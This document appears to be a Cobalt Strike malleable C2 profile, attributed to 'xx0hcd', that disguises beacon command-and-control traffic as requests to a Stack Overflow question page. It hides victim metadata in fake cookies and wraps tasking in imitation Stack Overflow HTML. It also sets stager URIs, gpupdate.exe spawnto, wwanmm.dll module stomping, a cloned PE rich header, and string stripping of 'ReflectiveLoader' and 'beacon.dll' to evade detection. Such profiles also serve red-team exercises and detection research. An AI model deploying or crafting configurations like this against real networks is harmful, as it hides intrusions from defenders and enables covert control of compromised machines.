221 lines
7.2 KiB
Plaintext
221 lines
7.2 KiB
Plaintext
#stackoverflow profile
|
|
#xx0hcd
|
|
#modify Host: headers to whatever.
|
|
|
|
set sleeptime "35000";
|
|
set jitter "22";
|
|
set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36";
|
|
set dns_idle "8.8.8.8";
|
|
set maxdns "245";
|
|
|
|
set sample_name "stackoverflow.profile";
|
|
|
|
#https-certificate {
|
|
# set keystore "your_store_file.store";
|
|
# set password "your_store_pass";
|
|
#}
|
|
|
|
http-get {
|
|
|
|
set uri "/questions/32251816/c-sharp-directives-compilation-error";
|
|
|
|
client {
|
|
|
|
# header "Host" "stackoverflow.com";
|
|
header "Accept" "*/*";
|
|
header "Accept-Language" "en-US";
|
|
# header "Connection" "close";
|
|
|
|
|
|
metadata {
|
|
netbios;
|
|
prepend "prov=";
|
|
append ";notice-ctt=!1";
|
|
append ";_ga=GA1.2.9924";
|
|
append ";_gat=1";
|
|
append ";__qca=P0-214459";
|
|
|
|
header "Cookie";
|
|
|
|
}
|
|
|
|
}
|
|
|
|
server {
|
|
|
|
header "Cache-control" "private";
|
|
header "Content-Type" "text/html; charset=utf-8";
|
|
header "X-Frame-Origins" "SAMEORIGIN";
|
|
header "Age" "0";
|
|
header "Via" "1.1 varnish";
|
|
header "X-Cache" "MISS";
|
|
header "Vary" "Accept-Encoding,Fastly-SSL";
|
|
|
|
output {
|
|
|
|
base64url;
|
|
prepend "\n";
|
|
prepend "<link rel=\"shortcut icon\" href=\"https://cdn.sstatic.net/Sites/stackoverflow/img/favicon.ico?v=";
|
|
prepend "<title>c# 4.0 - C# Preprocessor Directives (#if and #endif) not working. Compilation error - Stack Overflow</title>";
|
|
prepend "<head>\n";
|
|
prepend "<html itemscope itemtype=\"http://schema.org/QAPage\" class=\"html__responsive\">\n";
|
|
prepend "<!DOCTYPE html>\n\n";
|
|
append "<h2 data-answercount=\"3\">
|
|
3 Answers
|
|
<span style=\"display:none;\" itemprop=\"answerCount\">3</span>
|
|
</h2>
|
|
<div>
|
|
|
|
<div id=\"tabs\">
|
|
<a href=\"/questions/32251816/c-sharp-preprocessor-directives-if-and-endif-not-working-compilation-error?answertab=active#tab-top\" data-nav-xhref=\"\" title=\"Answers with the latest activity first\" data-value=\"active\" data-shortcut=\"A\">
|
|
active</a>
|
|
<a href=\"/questions/32251816/c-sharp-preprocessor-directives-if-and-endif-not-working-compilation-error?answertab=oldest#tab-top\" data-nav-xhref=\"\" title=\"Answers in the order they were provided\" data-value=\"oldest\" data-shortcut=\"O\">
|
|
oldest</a>
|
|
<a class=\"youarehere is-selected \" href=\"/questions/32251816/c-sharp-preprocessor-directives-if-and-endif-not-working-compilation-error?answertab=votes#tab-top\" data-nav-xhref=\"\" title=\"Answers with the highest score first\" data-value=\"votes\" data-shortcut=\"V\">
|
|
votes</a>";
|
|
|
|
print;
|
|
}
|
|
}
|
|
}
|
|
|
|
http-post {
|
|
|
|
set uri "/questions/32251817/c-sharp-directives-compilation-error";
|
|
set verb "GET";
|
|
|
|
client {
|
|
|
|
# header "Host" "stackoverflow.com";
|
|
header "Accept" "*/*";
|
|
header "Accept-Language" "en";
|
|
# header "Connection" "close";
|
|
|
|
output {
|
|
netbios;
|
|
prepend "prov=";
|
|
append ";notice-ctt=!1";
|
|
append ";_ga=GA1.2.9924";
|
|
append ";_gat=1";
|
|
append ";__qca=P0-214459";
|
|
|
|
header "Cookie";
|
|
|
|
|
|
}
|
|
|
|
|
|
id {
|
|
base64url;
|
|
parameter "answertab";
|
|
|
|
}
|
|
}
|
|
|
|
server {
|
|
|
|
header "Cache-control" "private";
|
|
header "Content-Type" "text/html; charset=utf-8";
|
|
header "X-Frame-Origins" "SAMEORIGIN";
|
|
header "Strict-Transport-Security" "max-age=15552000";
|
|
header "Via" "1.1 varnish";
|
|
header "Age" "0";
|
|
header "Connection" "close";
|
|
header "X-Cache" "MISS";
|
|
header "X-Cache-Hits" "0";
|
|
header "Vary" "Fastly-SSL";
|
|
|
|
|
|
output {
|
|
base64url;
|
|
prepend "\n";
|
|
prepend "<link rel=\"shortcut icon\" href=\"https://cdn.sstatic.net/Sites/stackoverflow/img/favicon.ico?v=";
|
|
prepend "<title>c# 4.0 - C# Preprocessor Directives (#if and #endif) not working. Compilation error - Stack Overflow</title>";
|
|
prepend "<head>\n";
|
|
prepend "<html itemscope itemtype=\"http://schema.org/QAPage\" class=\"html__responsive\">\n";
|
|
prepend "<!DOCTYPE html>\n\n";
|
|
append "<h2 data-answercount=\"3\">
|
|
3 Answers
|
|
<span style=\"display:none;\" itemprop=\"answerCount\">3</span>
|
|
</h2>
|
|
<div>
|
|
|
|
<div id=\"tabs\">
|
|
<a href=\"/questions/32251816/c-sharp-preprocessor-directives-if-and-endif-not-working-compilation-error?answertab=active#tab-top\" data-nav-xhref=\"\" title=\"Answers with the latest activity first\" data-value=\"active\" data-shortcut=\"A\">
|
|
active</a>
|
|
<a href=\"/questions/32251816/c-sharp-preprocessor-directives-if-and-endif-not-working-compilation-error?answertab=oldest#tab-top\" data-nav-xhref=\"\" title=\"Answers in the order they were provided\" data-value=\"oldest\" data-shortcut=\"O\">
|
|
oldest</a>
|
|
<a class=\"youarehere is-selected \" href=\"/questions/32251816/c-sharp-preprocessor-directives-if-and-endif-not-working-compilation-error?answertab=votes#tab-top\" data-nav-xhref=\"\" title=\"Answers with the highest score first\" data-value=\"votes\" data-shortcut=\"V\">
|
|
votes</a>";
|
|
|
|
print;
|
|
}
|
|
}
|
|
}
|
|
|
|
http-stager {
|
|
|
|
set uri_x86 "/posts/32251817/ivc/7600";
|
|
set uri_x64 "/posts/32251816/ivc/7600";
|
|
|
|
client {
|
|
# header "Host" "stackoverflow.com";
|
|
header "Accept" "*/*";
|
|
header "Accept-Language" "en-US,en;q=0.5";
|
|
header "X-Requested-With" "XMLHTTPRequest";
|
|
header "Connection" "close";
|
|
}
|
|
|
|
server {
|
|
header "Cache-control" "no-cache, no-store, must-revalidate";
|
|
header "Content-Type" "text/plain";
|
|
header "X-Frame-Options" "SAMEORIGIN";
|
|
header "Via" "1.1 varnish";
|
|
header "Vary" "Fastly-SSL";
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
###Malleable PE Options###
|
|
#always test spawnto and module stomp before using. My examples tested on Windows 10 Pro.
|
|
|
|
set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
|
|
set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
|
|
|
|
#used peclone on wwanmm.dll.
|
|
#don't use 'set image_size_xx' if using 'set module_xx'
|
|
stage {
|
|
set checksum "0";
|
|
set compile_time "25 Oct 2016 01:57:23";
|
|
set entry_point "170000";
|
|
# set image_size_x86 "6586368";
|
|
# set image_size_x64 "6586368";
|
|
# set name "WWanMM.dll";
|
|
set userwx "false";
|
|
set cleanup "true";
|
|
set sleep_mask "true";
|
|
set stomppe "true";
|
|
set obfuscate "true";
|
|
set rich_header "\xee\x50\x19\xcf\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xa3\x49\xe4\x9c\x84\x31\x77\x9c\x1e\xad\x86\x9c\xae\x31\x77\x9c\x1e\xad\x85\x9c\xa7\x31\x77\x9c\xaa\x31\x76\x9c\x08\x31\x77\x9c\x1e\xad\x98\x9c\xa3\x31\x77\x9c\x1e\xad\x84\x9c\x98\x31\x77\x9c\x1e\xad\x99\x9c\xab\x31\x77\x9c\x1e\xad\x80\x9c\x6d\x31\x77\x9c\x1e\xad\x9a\x9c\xab\x31\x77\x9c\x1e\xad\x87\x9c\xab\x31\x77\x9c\x52\x69\x63\x68\xaa\x31\x77\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
|
|
|
|
|
|
#module stomp
|
|
|
|
set module_x86 "wwanmm.dll";
|
|
set module_x64 "wwanmm.dll";
|
|
|
|
transform-x86 {
|
|
prepend "\x90\x90\x90";
|
|
strrep "ReflectiveLoader" "";
|
|
strrep "beacon.dll" "";
|
|
}
|
|
|
|
transform-x64 {
|
|
prepend "\x90\x90\x90";
|
|
strrep "ReflectiveLoader" "";
|
|
strrep "beacon.64.dll" "";
|
|
}
|
|
}
|